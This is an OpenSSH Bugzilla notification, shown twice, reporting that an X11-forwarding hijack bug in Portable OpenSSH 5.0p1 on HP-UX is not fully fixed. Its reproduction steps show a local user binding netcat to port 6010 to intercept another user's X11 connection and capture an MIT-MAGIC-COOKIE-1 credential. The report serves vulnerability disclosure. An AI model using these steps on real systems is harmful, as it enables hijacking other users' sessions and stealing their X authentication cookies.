https://bugzilla.mindrot.org/show_bug.cgi?id=1464
Summary: "possible hijacking of X11-forwarded connections" bug
has not been fixed completely
Classification: Unclassified
Product: Portable OpenSSH
Version: 5.0p1
Platform: Other
OS/Version: HP-UX
Status: NEW
Severity: security
Priority: P5
Component: sshd
AssignedTo: bitbucket@mindrot.org
ReportedBy: sway2004009@hotmail.com
Hi OpenSSH team,
I am still able to reproduce this problem with openssh50 code both on
hpux.
Seems like OpenSSH didn't fix this problem completely.
how to reproduce:
1. root at sshpa4# uname -aHP-UX sshpa4 B.11.23 U 9000/800 3267743753
unlimited-user license
2. sshd_config
X11Forwarding yesX11DisplayOffset 10X11UseLocalhost no
// must not use "yes" to bind to localhost
3. /opt/ssh/sbin/sshd
4. log to sshpa4 from another terminal with normal user "sway" and
start "nc"
sway at sshpa4# /opt/netcat/bin/nc -l -p 6010 -v -v -s
sshpa4.chn.hp.comlistening on [16.157.129.223] 6010 ...
5. logon to sshpa4 with another "leanne" with X11 forwarding
leanne at sshpa4# echo $DISPLAY16.157.129.223:10.0
leanne at sshpa4# netstat -an|grep 6010tcp 0 0
16.157.129.223.6010 *.* LISTENtcp 0
0 *.6010 *.* LISTENtcp 0
0 *.6010 *.* LISTENtcp 0
0 *.6010 *.* LISTEN
6. user sway2 starts any X program will end with being hijacked by user
"sway"
leanne at sshpa4# xclock
7. hijacked by user "sway"
sway at sshpa4# /opt/netcat/bin/nc -l -p 6010 -v -v -s
sshpa4.chn.hp.comlistening on [16.157.129.223] 6010 ...connect to
[16.157.129.223] from sshpa4.chn.hp.com [16.157.129.223] 54765B
MIT-MAGIC-COOKIE-1Öbs«¨¼ÓŠG‘‘›!ƒÂ
I found that this problem could only happen when the "X11UseLocalhost
no" is set in the sshd_config.
I checked the code, found that there might be something wrong with the
"channel_set_reuseaddr(sock);" function which is called in the function
x11_create_display_inet in file channels.c
Can someone check this out for me , thanks.
--
Configure bugmail: https://bugzilla.mindrot.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are watching the assignee of the bug.
_______________________________________________
openssh-bugs mailing list
openssh-bugs@mindrot.org
https://lists.mindrot.org/mailman/listinfo/openssh-bugs
Summary: "possible hijacking of X11-forwarded connections" bug
has not been fixed completely
Classification: Unclassified
Product: Portable OpenSSH
Version: 5.0p1
Platform: Other
OS/Version: HP-UX
Status: NEW
Severity: security
Priority: P5
Component: sshd
AssignedTo: bitbucket@mindrot.org
ReportedBy: sway2004009@hotmail.com
Hi OpenSSH team,
I am still able to reproduce this problem with openssh50 code both on
hpux.
Seems like OpenSSH didn't fix this problem completely.
how to reproduce:
1. root at sshpa4# uname -aHP-UX sshpa4 B.11.23 U 9000/800 3267743753
unlimited-user license
2. sshd_config
X11Forwarding yesX11DisplayOffset 10X11UseLocalhost no
// must not use "yes" to bind to localhost
3. /opt/ssh/sbin/sshd
4. log to sshpa4 from another terminal with normal user "sway" and
start "nc"
sway at sshpa4# /opt/netcat/bin/nc -l -p 6010 -v -v -s
sshpa4.chn.hp.comlistening on [16.157.129.223] 6010 ...
5. logon to sshpa4 with another "leanne" with X11 forwarding
leanne at sshpa4# echo $DISPLAY16.157.129.223:10.0
leanne at sshpa4# netstat -an|grep 6010tcp 0 0
16.157.129.223.6010 *.* LISTENtcp 0
0 *.6010 *.* LISTENtcp 0
0 *.6010 *.* LISTENtcp 0
0 *.6010 *.* LISTEN
6. user sway2 starts any X program will end with being hijacked by user
"sway"
leanne at sshpa4# xclock
7. hijacked by user "sway"
sway at sshpa4# /opt/netcat/bin/nc -l -p 6010 -v -v -s
sshpa4.chn.hp.comlistening on [16.157.129.223] 6010 ...connect to
[16.157.129.223] from sshpa4.chn.hp.com [16.157.129.223] 54765B
MIT-MAGIC-COOKIE-1Öbs«¨¼ÓŠG‘‘›!ƒÂ
I found that this problem could only happen when the "X11UseLocalhost
no" is set in the sshd_config.
I checked the code, found that there might be something wrong with the
"channel_set_reuseaddr(sock);" function which is called in the function
x11_create_display_inet in file channels.c
Can someone check this out for me , thanks.
--
Configure bugmail: https://bugzilla.mindrot.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are watching the assignee of the bug.
_______________________________________________
openssh-bugs mailing list
openssh-bugs@mindrot.org
https://lists.mindrot.org/mailman/listinfo/openssh-bugs